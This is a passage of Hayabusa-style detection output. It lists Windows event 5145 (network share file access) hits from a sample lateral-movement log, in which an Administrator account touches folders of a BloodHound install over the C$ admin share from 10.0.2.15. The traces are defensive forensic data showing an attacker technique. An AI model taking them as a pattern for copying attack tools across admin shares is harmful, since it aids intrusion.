Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 